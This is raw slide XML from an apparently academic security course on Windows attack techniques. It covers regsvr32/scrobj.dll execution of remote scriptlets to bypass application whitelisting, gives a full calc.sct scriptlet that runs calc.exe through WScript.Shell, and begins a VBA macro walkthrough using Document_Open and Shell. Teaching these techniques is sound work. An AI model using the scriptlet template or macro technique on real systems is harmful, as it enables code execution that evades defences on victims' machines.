                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> scrobj.dll </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Usecase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: Execute code from remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>scriptlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, bypass Application whitelisting </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>required: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>MITRE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ATT&amp;CK®: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>T1218.010: Regsvr32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>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45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example (1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>lolbas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>-project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172155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528" y="2060848"/>
            <a:ext cx="8712968" cy="4248472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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&lt;?XML version="1.0"?&gt;</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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scriptlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</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&lt;registration</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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>progid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="TESTING"</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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="{A1112221-0000-0000-3000-000DA00DABFC}" &gt;</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  &lt;script language="JScript"&gt;</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    &lt;![CDATA[</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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> foo = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>").Run("calc.exe"); </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    ]]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script&gt;</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&lt;/registration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scriptlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>calc.sct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Red </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文字方塊 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843808" y="5445224"/>
            <a:ext cx="5796136" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Store this file in directory:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\User\Fu-Hau H\Desktop\Courses\FALL2022</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW"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13079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94AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="116632"/>
            <a:ext cx="8229600" cy="792088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example (2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25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583" y="980728"/>
            <a:ext cx="8391103" cy="460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59" y="5659460"/>
            <a:ext cx="7167593" cy="70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361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94AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="116632"/>
            <a:ext cx="8229600" cy="936104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example (3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="https://2121993737-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MRh03Vwd4nuiUi3Oje7%2F-MRkYsMT_--86drnHom5%2F-MRkYuQBUT6eIUElTwE7%2Fimage.png?alt=media&amp;token=647b50b1-0579-47fb-bf58-738b073305d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085329"/>
            <a:ext cx="7652655" cy="561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05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94AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>VBA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Macro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(1)</a:t>
            </a:r>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8213601" cy="435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內容版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835696" y="5877272"/>
            <a:ext cx="6840759" cy="465501"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>按下 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Alt+F11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>會進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Macro Editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3451547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94AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>VBA Macro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(2)</a:t>
            </a:r>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14827"/>
            <a:ext cx="8111033" cy="432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內容版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835696" y="5877272"/>
            <a:ext cx="6840759" cy="465501"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>選擇 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>檢視</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> 下的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>程式碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165255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D594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>VBA Macro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(3)</a:t>
            </a:r>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8368283" cy="450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3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1521" y="2675467"/>
            <a:ext cx="8640960" cy="3489837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在程式碼中輸入以下程式。其中 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Document_Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 是一個事件，會在檔案開啟時觸發</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>VBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
